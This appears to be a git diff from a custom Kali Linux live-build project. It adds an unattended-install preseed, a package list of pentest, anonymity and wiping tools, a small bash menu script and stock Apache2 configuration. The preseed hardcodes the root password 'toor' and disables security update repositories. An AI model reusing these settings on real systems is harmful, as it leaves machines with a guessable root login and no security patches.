diff --git a/config/02-unattended-boot.binary b/config/02-unattended-boot.binary new file mode 100755 index 00000000..bbac3189 --- /dev/null +++ b/config/02-unattended-boot.binary @@ -0,0 +1,8 @@ +#!/bin/sh +cat >>binary/isolinux/install.cfg < label install +menu label ^Unattended Install +menu default +linux /install/vmlinuz +initrd /install/initrd.gz +append vga=788 — quiet file=/cdrom/install/preseed.cfg locale=en_US keymap=us hostname=kali domain=local.lan +END diff --git a/config/preseed.cfg b/config/preseed.cfg new file mode 100755 index 00000000..71b5f496 --- /dev/null +++ b/config/preseed.cfg @@ -0,0 +1,79 @@ +d-i debian-installer/locale string en_US.UTF-8 +d-i console-keymaps-at/keymap select us +d-i mirror/country string enter information manually +d-i mirror/http/hostname string http.kali.org +d-i mirror/http/directory string /kali +d-i keyboard-configuration/xkb-keymap select us +d-i mirror/http/proxy string +d-i mirror/suite string kali-rolling +d-i mirror/codename string kali-rolling + +d-i clock-setup/utc boolean true +d-i time/zone string US/Mountain + +# Disable security, volatile and backports +d-i apt-setup/services-select multiselect + +# Enable contrib and non-free +d-i apt-setup/non-free boolean true +d-i apt-setup/contrib boolean true + +# Disable source repositories too +d-i apt-setup/enable-source-repositories boolean false + +# Partitioning +d-i partman-auto/method string regular +d-i partman-lvm/device_remove_lvm boolean true +d-i partman-md/device_remove_md boolean true +d-i partman-lvm/confirm boolean true +d-i partman-auto/choose_recipe select atomic +d-i partman-auto/disk string /dev/sda +d-i partman/confirm_write_new_label boolean true +d-i partman/choose_partition select finish +d-i partman/confirm boolean true +d-i partman/confirm_nooverwrite boolean true +d-i partman-partitioning/confirm_write_new_label boolean true + +# Disable CDROM entries after install +d-i apt-setup/disable-cdrom-entries boolean true + +# Upgrade installed packages +d-i pkgsel/upgrade select full-upgrade + +# Change default hostname +d-i netcfg/get_hostname string Kali +d-i netcfg/get_domain string unassigned-domain +#d-i netcfg/choose_interface select auto +d-i netcfg/choose_interface select eth0 +d-i netcfg/dhcp_timeout string 60 + +d-i hw-detect/load_firmware boolean false + +# Do not create a normal user account +d-i passwd/make-user boolean false +d-i passwd/root-password password toor +d-i passwd/root-password-again password toor + +d-i apt-setup/use_mirror boolean true +d-i grub-installer/only_debian boolean true +d-i grub-installer/with_other_os boolean false +d-i grub-installer/bootdev string /dev/sda +d-i finish-install/reboot_in_progress note + +# Disable popularity-contest +popularity-contest popularity-contest/participate boolean false + +kismet kismet/install-setuid boolean false +kismet kismet/install-users string + +sslh sslh/inetd_or_standalone select standalone + +mysql-server-5.5 mysql-server/root_password_again password +mysql-server-5.5 mysql-server/root_password password +mysql-server-5.5 mysql-server/error_setting_password error +mysql-server-5.5 mysql-server-5.5/postrm_remove_databases boolean false +mysql-server-5.5 mysql-server-5.5/start_on_boot boolean true +mysql-server-5.5 mysql-server-5.5/nis_warning note +mysql-server-5.5 mysql-server-5.5/really_downgrade boolean false +mysql-server-5.5 mysql-server/password_mismatch error +mysql-server-5.5 mysql-server/no_upgrade_when_using_ndb error diff --git a/config/software.list.chroot b/config/software.list.chroot new file mode 100644 index 00000000..5bfa4baf --- /dev/null +++ b/config/software.list.chroot @@ -0,0 +1,22 @@ +open-vm-tools-desktop +libreoffice +fuse +guake +htop +exfat-fuse +exfat-utils +apt-file +tor +proxychains +scrub +vega +bleachbit +metagoofil +screenfetch +cherrytree +cups +cups-client +foomatic-db +cockpit +fwbuilder +gimp \ No newline at end of file diff --git a/debs/code_1.26.1-1534444688_amd64.deb.REMOVED.git-id b/debs/code_1.26.1-1534444688_amd64.deb.REMOVED.git-id new file mode 100644 index 00000000..8d92c46f --- /dev/null +++ b/debs/code_1.26.1-1534444688_amd64.deb.REMOVED.git-id @@ -0,0 +1 @@ +2b42038ffa021a427f2708223949d41cca25782e \ No newline at end of file diff --git a/debs/parrot-themes_2.6+parrot6_all.deb b/debs/parrot-themes_2.6+parrot6_all.deb new file mode 100755 index 00000000..34a79e62 Binary files /dev/null and b/debs/parrot-themes_2.6+parrot6_all.deb differ diff --git a/filesystem/bin/menu b/filesystem/bin/menu new file mode 100755 index 00000000..9c527f9f --- /dev/null +++ b/filesystem/bin/menu @@ -0,0 +1,34 @@ +!/bin/bash +# init +function pause(){ +echo 'Press any key to continue...'; read -p "$*" +} +clear +input="/bin/menu.txt" +while IFS= read -r var +do + echo "$var" +done < "$input" +echo ' Eneter item to complete';read option +case "$option" in + 1) lsblk + pause;; + 2) df -h + pause;; + 3) apt update + pause;; + 4) apt upgrade -y + pause;; + 5) gsettings set org.gnome.desktop.interface scaling-factor 1 + pause;; + 6) gsettings set org.gnome.desktop.interface scaling-factor 2 + pause;; + 7) gsettings set org.gnome.desktop.interface scaling-factor 3 + pause;; + 8) gsettings set org.gnome.desktop.interface scaling-factor 4 + pause;; + 0) exit ;; + esac +menu + + diff --git a/filesystem/bin/menu.txt b/filesystem/bin/menu.txt new file mode 100644 index 00000000..6c301d7b --- /dev/null +++ b/filesystem/bin/menu.txt @@ -0,0 +1,15 @@ + + + Main Menu.... +=================================================================== + 1. lsblk - List attached drives + 2. df -h - Show disk space used + 3. Update - Update kali repositories + 4. Upgrade - Upgrade kali and bring up-to-date + 5. Screen Size Def - Reset screen size to default + 6. Screen Size x 2 - Reset Screen size to scale x 2 + 7. Screen Size x 3 - Reset Screen size to scale x 3 + 8. Screen Size x 4 - Reset screen size to scale x 4 + 0. Exit +=================================================================== + diff --git a/filesystem/etc/apache2/apache2.conf b/filesystem/etc/apache2/apache2.conf new file mode 100644 index 00000000..617152ce --- /dev/null +++ b/filesystem/etc/apache2/apache2.conf @@ -0,0 +1,221 @@ +# This is the main Apache server configuration file. It contains the +# configuration directives that give the server its instructions. +# See http://httpd.apache.org/docs/2.4/ for detailed information about +# the directives and /usr/share/doc/apache2/README.Debian about Debian specific +# hints. +# +# +# Summary of how the Apache 2 configuration works in Debian: +# The Apache 2 web server configuration in Debian is quite different to +# upstream's suggested way to configure the web server. This is because Debian's +# default Apache2 installation attempts to make adding and removing modules, +# virtual hosts, and extra configuration directives as flexible as possible, in +# order to make automating the changes and administering the server as easy as +# possible. + +# It is split into several files forming the configuration hierarchy outlined +# below, all located in the /etc/apache2/ directory: +# +# /etc/apache2/ +# |-- apache2.conf +# | `-- ports.conf +# |-- mods-enabled +# | |-- *.load +# | `-- *.conf +# |-- conf-enabled +# | `-- *.conf +# `-- sites-enabled +# `-- *.conf +# +# +# * apache2.conf is the main configuration file (this file). It puts the pieces +# together by including all remaining configuration files when starting up the +# web server. +# +# * ports.conf is always included from the main configuration file. It is +# supposed to determine listening ports for incoming connections which can be +# customized anytime. +# +# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ +# directories contain particular configuration snippets which manage modules, +# global configuration fragments, or virtual host configurations, +# respectively. +# +# They are activated by symlinking available configuration files from their +# respective *-available/ counterparts. These should be managed by using our +# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See +# their respective man pages for detailed information. +# +# * The binary is called apache2. Due to the use of environment variables, in +# the default configuration, apache2 needs to be started/stopped with +# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not +# work with the default configuration. + + +# Global configuration +# + +# +# ServerRoot: The top of the directory tree under which the server's +# configuration, error, and log files are kept. +# +# NOTE! If you intend to place this on an NFS (or otherwise network) +# mounted filesystem then please read the Mutex documentation (available +# at ); +# you will save yourself a lot of trouble. +# +# Do NOT add a slash at the end of the directory path. +# +#ServerRoot "/etc/apache2" + +# +# The accept serialization lock file MUST BE STORED ON A LOCAL DISK. +# +#Mutex file:${APACHE_LOCK_DIR} default + +# +# PidFile: The file in which the server should record its process +# identification number when it starts. +# This needs to be set in /etc/apache2/envvars +# +PidFile ${APACHE_PID_FILE} + +# +# Timeout: The number of seconds before receives and sends time out. +# +Timeout 300 + +# +# KeepAlive: Whether or not to allow persistent connections (more than +# one request per connection). Set to "Off" to deactivate. +# +KeepAlive On + +# +# MaxKeepAliveRequests: The maximum number of requests to allow +# during a persistent connection. Set to 0 to allow an unlimited amount. +# We recommend you leave this number high, for maximum performance. +# +MaxKeepAliveRequests 100 + +# +# KeepAliveTimeout: Number of seconds to wait for the next request from the +# same client on the same connection. +# +KeepAliveTimeout 5 + + +# These need to be set in /etc/apache2/envvars +User ${APACHE_RUN_USER} +Group ${APACHE_RUN_GROUP} + +# +# HostnameLookups: Log the names of clients or just their IP addresses +# e.g., www.apache.org (on) or 204.62.129.132 (off). +# The default is off because it'd be overall better for the net if people +# had to knowingly turn this feature on, since enabling it means that +# each client request will result in AT LEAST one lookup request to the +# nameserver. +# +HostnameLookups Off + +# ErrorLog: The location of the error log file. +# If you do not specify an ErrorLog directive within a +# container, error messages relating to that virtual host will be +# logged here. If you *do* define an error logfile for a +# container, that host's errors will be logged there and not here. +# +ErrorLog ${APACHE_LOG_DIR}/error.log + +# +# LogLevel: Control the severity of messages logged to the error_log. +# Available values: trace8, ..., trace1, debug, info, notice, warn, +# error, crit, alert, emerg. +# It is also possible to configure the log level for particular modules, e.g. +# "LogLevel info ssl:warn" +# +LogLevel warn + +# Include module configuration: +IncludeOptional mods-enabled/*.load +IncludeOptional mods-enabled/*.conf + +# Include list of ports to listen on +Include ports.conf + + +# Sets the default security model of the Apache2 HTTPD server. It does +# not allow access to the root filesystem outside of /usr/share and /var/www. +# The former is used by web applications packaged in Debian, +# the latter may be used for local directories served by the web server. If +# your system is serving content from a sub-directory in /srv you must allow +# access here, or in any related virtual host. + + Options FollowSymLinks + AllowOverride None + Require all denied + + + + AllowOverride None + Require all granted + + + + Options Indexes FollowSymLinks + AllowOverride None + Require all granted + + +# +# Options Indexes FollowSymLinks +# AllowOverride None +# Require all granted +# + + + + +# AccessFileName: The name of the file to look for in each directory +# for additional configuration directives. See also the AllowOverride +# directive. +# +AccessFileName .htaccess + +# +# The following lines prevent .htaccess and .htpasswd files from being +# viewed by Web clients. +# + + Require all denied + + + +# +# The following directives define some format nicknames for use with +# a CustomLog directive. +# +# These deviate from the Common Log Format definitions in that they use %O +# (the actual bytes sent including headers) instead of %b (the size of the +# requested file), because the latter makes it impossible to detect partial +# requests. +# +# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. +# Use mod_remoteip instead. +# +LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined +LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined +LogFormat "%h %l %u %t \"%r\" %>s %O" common +LogFormat "%{Referer}i -> %U" referer +LogFormat "%{User-agent}i" agent + +# Include of directories ignores editors' and dpkg's backup files, +# see README.Debian for details. + +# Include generic snippets of statements +IncludeOptional conf-enabled/*.conf + +# Include the virtual host configurations: +IncludeOptional sites-enabled/*.conf + +# vim: syntax=apache ts=4 sw=4 sts=4 sr noet diff --git a/filesystem/etc/apache2/conf-available/charset.conf b/filesystem/etc/apache2/conf-available/charset.conf new file mode 100644 index 00000000..8b0f4159 --- /dev/null +++ b/filesystem/etc/apache2/conf-available/charset.conf @@ -0,0 +1,8 @@ +# Read the documentation before enabling AddDefaultCharset. +# In general, it is only a good idea if you know that all your files +# have this encoding. It will override any encoding given in the files +# in meta http-equiv or xml encoding tags. + +#AddDefaultCharset UTF-8 + +# vim: syntax=apache ts=4 sw=4 sts=4 sr noet diff --git a/filesystem/etc/apache2/conf-available/javascript-common.conf b/filesystem/etc/apache2/conf-available/javascript-common.conf new file mode 100644 index 00000000..7e5dbd3e --- /dev/null +++ b/filesystem/etc/apache2/conf-available/javascript-common.conf @@ -0,0 +1,5 @@ +Alias /javascript /usr/share/javascript/ + + + Options FollowSymLinks MultiViews + diff --git a/filesystem/etc/apache2/conf-available/localized-error-pages.conf b/filesystem/etc/apache2/conf-available/localized-error-pages.conf new file mode 100644 index 00000000..f188d806 --- /dev/null +++ b/filesystem/etc/apache2/conf-available/localized-error-pages.conf @@ -0,0 +1,81 @@ +# Customizable error responses come in three flavors: +# 1) plain text +# 2) local redirects +# 3) external redirects +# +# Some examples: +#ErrorDocument 500 "The server made a boo boo." +#ErrorDocument 404 /missing.html +#ErrorDocument 404 "/cgi-bin/missing_handler.pl" +#ErrorDocument 402 http://www.example.com/subscription_info.html +# + +# +# Putting this all together, we can internationalize error responses. +# +# We use Alias to redirect any /error/HTTP_.html.var response to +# our collection of by-error message multi-language collections. We use +# includes to substitute the appropriate text. +# +# You can modify the messages' appearance without changing any of the +# default HTTP_.html.var files by adding the line: +# +#Alias /error/include/ "/your/include/path/" +# +# which allows you to create your own set of files by starting with the +# /usr/share/apache2/error/include/ files and copying them to /your/include/path/, +# even on a per-VirtualHost basis. If you include the Alias in the global server +# context, is has to come _before_ the 'Alias /error/ ...' line. +# +# The default include files will display your Apache version number and your +# ServerAdmin email address regardless of the setting of ServerSignature. +# +# WARNING: The configuration below will NOT work out of the box if you have a +# SetHandler directive in a context somewhere. Adding +# the following three lines AFTER the context should +# make it work in most cases: +# +# SetHandler none +# +# +# The internationalized error documents require mod_alias, mod_include +# and mod_negotiation. To activate them, uncomment the following 37 lines. + +# +# +# +# +# Alias /error/ "/usr/share/apache2/error/" +# +# +# Options IncludesNoExec +# AddOutputFilter Includes html +# AddHandler type-map var +# Order allow,deny +# Allow from all +# LanguagePriority en cs de es fr it nl sv pt-br ro +# ForceLanguagePriority Prefer Fallback +# +# +# ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var +# ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var +# ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var +# ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var +# ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var +# ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var +# ErrorDocument 410 /error/HTTP_GONE.html.var +# ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var +# ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var +# ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var +# ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var +# ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var +# ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var +# ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var +# ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var +# ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var +# ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var +# +# +# + +# vim: syntax=apache ts=4 sw=4 sts=4 sr noet diff --git a/filesystem/etc/apache2/conf-available/other-vhosts-access-log.conf b/filesystem/etc/apache2/conf-available/other-vhosts-access-log.conf new file mode 100644 index 00000000..5e9f5e9e --- /dev/null +++ b/filesystem/etc/apache2/conf-available/other-vhosts-access-log.conf @@ -0,0 +1,4 @@ +# Define an access log for VirtualHosts that don't define their own logfile +CustomLog ${APACHE_LOG_DIR}/other_vhosts_access.log vhost_combined + +# vim: syntax=apache ts=4 sw=4 sts=4 sr noet diff --git a/filesystem/etc/apache2/conf-available/security.conf b/filesystem/etc/apache2/conf-available/security.conf new file mode 100644 index 00000000..f9f69d49 --- /dev/null +++ b/filesystem/etc/apache2/conf-available/security.conf @@ -0,0 +1,73 @@ +# +# Disable access to the entire file system except for the directories that +# are explicitly allowed later. +# +# This currently breaks the configurations that come with some web application +# Debian packages. +# +# +# AllowOverride None +# Require all denied +# + + +# Changing the following options will not really affect the security of the +# server, but might make attacks slightly more difficult in some cases. + +# +# ServerTokens +# This directive configures what you return as the Server HTTP response +# Header. The default is 'Full' which sends information about the OS-Type +# and compiled in modules. +# Set to one of: Full | OS | Minimal | Minor | Major | Prod +# where Full conveys the most information, and Prod the least. +#ServerTokens Minimal +ServerTokens OS +#ServerTokens Full + +# +# Optionally add a line containing the server version and virtual host +# name to server-generated pages (internal error documents, FTP directory +# listings, mod_status and mod_info output etc., but not CGI generated +# documents or custom error documents). +# Set to "EMail" to also include a mailto: link to the ServerAdmin. +# Set to one of: On | Off | EMail +#ServerSignature Off +ServerSignature On + +# +# Allow TRACE method +# +# Set to "extended" to also reflect the request body (only for testing and +# diagnostic purposes). +# +# Set to one of: On | Off | extended +TraceEnable Off +#TraceEnable On + +# +# Forbid access to version control directories +# +# If you use version control systems in your document root, you should +# probably deny access to their directories. For example, for subversion: +# +# +# Require all denied +# + +# +# Setting this header will prevent MSIE from interpreting files as something +# else than declared by the content type in the HTTP headers. +# Requires mod_headers to be enabled. +# +#Header set X-Content-Type-Options: "nosniff" + +# +# Setting this header will prevent other sites from embedding pages from this +# site as frames. This defends against clickjacking attacks. +# Requires mod_headers to be enabled. +# +#Header set X-Frame-Options: "sameorigin" + + +# vim: syntax=apache ts=4 sw=4 sts=4 sr noet diff --git a/filesystem/etc/apache2/conf-available/serve-cgi-bin.conf b/filesystem/etc/apache2/conf-available/serve-cgi-bin.conf new file mode 100644 index 00000000..b02782da --- /dev/null +++ b/filesystem/etc/apache2/conf-available/serve-cgi-bin.conf @@ -0,0 +1,20 @@ + + + Define ENABLE_USR_LIB_CGI_BIN + + + + Define ENABLE_USR_LIB_CGI_BIN + + + + ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ + + AllowOverride None + Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch + Require all granted + + + + +# vim: syntax=apache ts=4 sw=4 sts=4 sr noet diff --git a/filesystem/etc/apache2/conf-enabled/charset.conf b/filesystem/etc/apache2/conf-enabled/charset.conf new file mode 120000 index 00000000..4a6ca084 --- /dev/null +++ b/filesystem/etc/apache2/conf-enabled/charset.conf @@ -0,0 +1 @@ +../conf-available/charset.conf \ No newline at end of file diff --git a/filesystem/etc/apache2/conf-enabled/javascript-common.conf b/filesystem/etc/apache2/conf-enabled/javascript-common.conf new file mode 120000 index 00000000..0a4baa4b --- /dev/null +++ b/filesystem/etc/apache2/conf-enabled/javascript-common.conf @@ -0,0 +1 @@ +../conf-available/javascript-common.conf \ No newline at end of file diff --git a/filesystem/etc/apache2/conf-enabled/localized-error-pages.conf b/filesystem/etc/apache2/conf-enabled/localized-error-pages.conf new file mode 120000 index 00000000..6e5ddaf1 --- /dev/null +++ b/filesystem/etc/apache2/conf-enabled/localized-error-pages.conf @@ -0,0 +1 @@ +../conf-available/localized-error-pages.conf \ No newline at end of file diff --git a/filesystem/etc/apache2/conf-enabled/other-vhosts-access-log.conf b/filesystem/etc/apache2/conf-enabled/other-vhosts-access-log.conf new file mode 120000 index 00000000..8af91e53 --- /dev/null +++ b/filesystem/etc/apache2/conf-enabled/other-vhosts-access-log.conf @@ -0,0 +1 @@ +../conf-available/other-vhosts-access-log.conf \ No newline at end of file diff --git a/filesystem/etc/apache2/conf-enabled/security.conf b/filesystem/etc/apache2/conf-enabled/security.conf new file mode 120000 index 00000000..036c97fa --- /dev/null +++ b/filesystem/etc/apache2/conf-enabled/security.conf @@ -0,0 +1 @@ +../conf-available/security.conf \ No newline at end of file diff --git a/filesystem/etc/apache2/conf-enabled/serve-cgi-bin.conf b/filesystem/etc/apache2/conf-enabled/serve-cgi-bin.conf new file mode 120000 index 00000000..d917f688 --- /dev/null +++ b/filesystem/etc/apache2/conf-enabled/serve-cgi-bin.conf @@ -0,0 +1 @@ +../conf-available/serve-cgi-bin.conf \ No newline at end of file diff --git a/filesystem/etc/apache2/envvars b/filesystem/etc/apache2/envvars new file mode 100644 index 00000000..91328ac7 --- /dev/null +++ b/filesystem/etc/apache2/envvars @@ -0,0 +1,47 @@ +# envvars - default environment variables for apache2ctl + +# this won't be correct after changing uid +unset HOME + +# for supporting multiple apache2 instances +if [ "${APACHE_CONFDIR##/etc/apache2-}" != "${APACHE_CONFDIR}" ] ; then + SUFFIX="-${APACHE_CONFDIR##/etc/apache2-}" +else + SUFFIX= +fi + +# Since there is no sane way to get the parsed apache2 config in scripts, some +# settings are defined via environment variables and then used in apache2ctl, +# /etc/init.d/apache2, /etc/logrotate.d/apache2, etc. +export APACHE_RUN_USER=www-data +export APACHE_RUN_GROUP=www-data +# temporary state file location. This might be changed to /run in Wheezy+1 +export APACHE_PID_FILE=/var/run/apache2/apache2$SUFFIX.pid +export APACHE_RUN_DIR=/var/run/apache2$SUFFIX +export APACHE_LOCK_DIR=/var/lock/apache2$SUFFIX +# Only /var/log/apache2 is handled by /etc/logrotate.d/apache2. +export APACHE_LOG_DIR=/var/log/apache2$SUFFIX + +## The locale used by some modules like mod_dav +export LANG=C +## Uncomment the following line to use the system default locale instead: +#. /etc/default/locale + +export LANG + +## The command to get the status for 'apache2ctl status'. +## Some packages providing 'www-browser' need '--dump' instead of '-dump'. +#export APACHE_LYNX='www-browser -dump' + +## If you need a higher file descriptor limit, uncomment and adjust the +## following line (default is 8192): +#APACHE_ULIMIT_MAX_FILES='ulimit -n 65536' + +## If you would like to pass arguments to the web server, add them below +## to the APACHE_ARGUMENTS environment. +#export APACHE_ARGUMENTS='' + +## Enable the debug mode for maintainer scripts. +## This will produce a verbose output on package installations of web server modules and web application +## installations which interact with Apache +#export APACHE2_MAINTSCRIPT_DEBUG=1 diff --git a/filesystem/etc/apache2/magic b/filesystem/etc/apache2/magic new file mode 100644 index 00000000..cdf9ac51 --- /dev/null +++ b/filesystem/etc/apache2/magic @@ -0,0 +1,935 @@ +# Magic data for mod_mime_magic (originally for file(1) command) +# +# The format is 4-5 columns: +# Column #1: byte number to begin checking from, ">" indicates continuation +# Column #2: type of data to match +# Column #3: contents of data to match +# Column #4: MIME type of result +# Column #5: MIME encoding of result (optional) + +#------------------------------------------------------------------------------ +# Localstuff: file(1) magic for locally observed files +# Add any locally observed files here. + +# Real Audio (Magic .ra\0375) +0 belong 0x2e7261fd audio/x-pn-realaudio +0 string .RMF application/vnd.rn-realmedia + +#video/x-pn-realvideo +#video/vnd.rn-realvideo +#application/vnd.rn-realmedia +# sigh, there are many mimes for that but the above are the most common. + +# Taken from magic, converted to magic.mime +# mime types according to http://www.geocities.com/nevilo/mod.htm: +# audio/it .it +# audio/x-zipped-it .itz +# audio/xm fasttracker modules +# audio/x-s3m screamtracker modules +# audio/s3m screamtracker modules +# audio/x-zipped-mod mdz +# audio/mod mod +# audio/x-mod All modules (mod, s3m, 669, mtm, med, xm, it, mdz, stm, itz, xmz, s3z) + +# Taken from loader code from mikmod version 2.14 +# by Steve McIntyre (stevem@chiark.greenend.org.uk) +# added title printing on 2003-06-24 +0 string MAS_UTrack_V00 +>14 string >/0 audio/x-mod +#audio/x-tracker-module + +#0 string UN05 MikMod UNI format module sound data + +0 string Extended\ Module: audio/x-mod +#audio/x-tracker-module +##>17 string >\0 Title: "%s" + +21 string/c \!SCREAM! audio/x-mod +#audio/x-screamtracker-module +21 string BMOD2STM audio/x-mod +#audio/x-screamtracker-module +1080 string M.K. audio/x-mod +#audio/x-protracker-module +#>0 string >\0 Title: "%s" +1080 string M!K! audio/x-mod +#audio/x-protracker-module +#>0 string >\0 Title: "%s" +1080 string FLT4 audio/x-mod +#audio/x-startracker-module +#>0 string >\0 Title: "%s" +1080 string FLT8 audio/x-mod +#audio/x-startracker-module +#>0 string >\0 Title: "%s" +1080 string 4CHN audio/x-mod +#audio/x-fasttracker-module +#>0 string >\0 Title: "%s" +1080 string 6CHN audio/x-mod +#audio/x-fasttracker-module +#>0 string >\0 Title: "%s" +1080 string 8CHN audio/x-mod +#audio/x-fasttracker-module +#>0 string >\0 Title: "%s" +1080 string CD81 audio/x-mod +#audio/x-oktalyzer-tracker-module +#>0 string >\0 Title: "%s" +1080 string OKTA audio/x-mod +#audio/x-oktalyzer-tracker-module +#>0 string >\0 Title: "%s" +# Not good enough. +#1082 string CH +#>1080 string >/0 %.2s-channel Fasttracker "oktalyzer" module sound data +1080 string 16CN audio/x-mod +#audio/x-taketracker-module +#>0 string >\0 Title: "%s" +1080 string 32CN audio/x-mod +#audio/x-taketracker-module +#>0 string >\0 Title: "%s" + +# Impuse tracker module (it) +0 string IMPM audio/x-mod +#>4 string >\0 "%s" +#>40 leshort !0 compatible w/ITv%x +#>42 leshort !0 created w/ITv%x + +#------------------------------------------------------------------------------ +# end local stuff +#------------------------------------------------------------------------------ + +# xml based formats! + +# svg + +0 string \38 string \<\!DOCTYPE\040svg image/svg+xml + + +# xml +0 string \2 short 0xbabe application/java + +#------------------------------------------------------------------------------ +# audio: file(1) magic for sound formats +# +# from Jan Nicolai Langfeldt , +# + +# Sun/NeXT audio data +0 string .snd +>12 belong 1 audio/basic +>12 belong 2 audio/basic +>12 belong 3 audio/basic +>12 belong 4 audio/basic +>12 belong 5 audio/basic +>12 belong 6 audio/basic +>12 belong 7 audio/basic + +>12 belong 23 audio/x-adpcm + +# DEC systems (e.g. DECstation 5000) use a variant of the Sun/NeXT format +# that uses little-endian encoding and has a different magic number +# (0x0064732E in little-endian encoding). +0 lelong 0x0064732E +>12 lelong 1 audio/x-dec-basic +>12 lelong 2 audio/x-dec-basic +>12 lelong 3 audio/x-dec-basic +>12 lelong 4 audio/x-dec-basic +>12 lelong 5 audio/x-dec-basic +>12 lelong 6 audio/x-dec-basic +>12 lelong 7 audio/x-dec-basic +# compressed (G.721 ADPCM) +>12 lelong 23 audio/x-dec-adpcm + +# Bytes 0-3 of AIFF, AIFF-C, & 8SVX audio files are "FORM" +# AIFF audio data +8 string AIFF audio/x-aiff +# AIFF-C audio data +8 string AIFC audio/x-aiff +# IFF/8SVX audio data +8 string 8SVX audio/x-aiff + + + +# Creative Labs AUDIO stuff +# Standard MIDI data +0 string MThd audio/unknown +#>9 byte >0 (format %d) +#>11 byte >1 using %d channels +# Creative Music (CMF) data +0 string CTMF audio/unknown +# SoundBlaster instrument data +0 string SBI audio/unknown +# Creative Labs voice data +0 string Creative\ Voice\ File audio/unknown +## is this next line right? it came this way... +#>19 byte 0x1A +#>23 byte >0 - version %d +#>22 byte >0 \b.%d + +# [GRR 950115: is this also Creative Labs? Guessing that first line +# should be string instead of unknown-endian long...] +#0 long 0x4e54524b MultiTrack sound data +#0 string NTRK MultiTrack sound data +#>4 long x - version %ld + +# Microsoft WAVE format (*.wav) +# [GRR 950115: probably all of the shorts and longs should be leshort/lelong] +# Microsoft RIFF +0 string RIFF +# - WAVE format +>8 string WAVE audio/x-wav +>8 string/B AVI video/x-msvideo +# +>8 string CDRA image/x-coreldraw + +# AAC (aka MPEG-2 NBC) +0 beshort&0xfff6 0xfff0 audio/X-HX-AAC-ADTS +0 string ADIF audio/X-HX-AAC-ADIF +0 beshort&0xffe0 0x56e0 audio/MP4A-LATM +0 beshort 0x4De1 audio/MP4A-LATM + +# MPEG Layer 3 sound files +0 beshort&0xfffe =0xfffa audio/mpeg +#MP3 with ID3 tag +0 string ID3 audio/mpeg +# Ogg/Vorbis +0 string OggS application/ogg + +#------------------------------------------------------------------------------ +# c-lang: file(1) magic for C programs or various scripts +# + +# XPM icons (Greg Roelofs, newt@uchicago.edu) +# ideally should go into "images", but entries below would tag XPM as C source +0 string /*\ XPM image/x-xpmi 7bit + +# 3DS (3d Studio files) +#16 beshort 0x3d3d image/x-3ds + +# this first will upset you if you're a PL/1 shop... (are there any left?) +# in which case rm it; ascmagic will catch real C programs +# C or REXX program text +#0 string /* text/x-c +# C++ program text +#0 string // text/x-c++ + +#------------------------------------------------------------------------------ +# commands: file(1) magic for various shells and interpreters +# +#0 string :\ shell archive or commands for antique kernel text +0 string #!/bin/sh application/x-shellscript +0 string #!\ /bin/sh application/x-shellscript +0 string #!/bin/csh application/x-shellscript +0 string #!\ /bin/csh application/x-shellscript +# korn shell magic, sent by George Wu, gwu@clyde.att.com +0 string #!/bin/ksh application/x-shellscript +0 string #!\ /bin/ksh application/x-shellscript +0 string #!/bin/tcsh application/x-shellscript +0 string #!\ /bin/tcsh application/x-shellscript +0 string #!/usr/local/tcsh application/x-shellscript +0 string #!\ /usr/local/tcsh application/x-shellscript +0 string #!/usr/local/bin/tcsh application/x-shellscript +0 string #!\ /usr/local/bin/tcsh application/x-shellscript +# bash shell magic, from Peter Tobias (tobias@server.et-inf.fho-emden.de) +0 string #!/bin/bash application/x-shellscript +0 string #!\ /bin/bash application/x-shellscript +0 string #!/usr/local/bin/bash application/x-shellscript +0 string #!\ /usr/local/bin/bash application/x-shellscript + +# +# zsh/ash/ae/nawk/gawk magic from cameron@cs.unsw.oz.au (Cameron Simpson) +0 string #!/bin/zsh application/x-shellscript +0 string #!/usr/bin/zsh application/x-shellscript +0 string #!/usr/local/bin/zsh application/x-shellscript +0 string #!\ /usr/local/bin/zsh application/x-shellscript +0 string #!/usr/local/bin/ash application/x-shellscript +0 string #!\ /usr/local/bin/ash application/x-shellscript +#0 string #!/usr/local/bin/ae Neil Brown's ae +#0 string #!\ /usr/local/bin/ae Neil Brown's ae +0 string #!/bin/nawk application/x-nawk +0 string #!\ /bin/nawk application/x-nawk +0 string #!/usr/bin/nawk application/x-nawk +0 string #!\ /usr/bin/nawk application/x-nawk +0 string #!/usr/local/bin/nawk application/x-nawk +0 string #!\ /usr/local/bin/nawk application/x-nawk +0 string #!/bin/gawk application/x-gawk +0 string #!\ /bin/gawk application/x-gawk +0 string #!/usr/bin/gawk application/x-gawk +0 string #!\ /usr/bin/gawk application/x-gawk +0 string #!/usr/local/bin/gawk application/x-gawk +0 string #!\ /usr/local/bin/gawk application/x-gawk +# +0 string #!/bin/awk application/x-awk +0 string #!\ /bin/awk application/x-awk +0 string #!/usr/bin/awk application/x-awk +0 string #!\ /usr/bin/awk application/x-awk +# update to distinguish from *.vcf files by Joerg Jenderek: joerg dot jenderek at web dot de +#0 regex BEGIN[[:space:]]*[{] application/x-awk + +# For Larry Wall's perl language. The 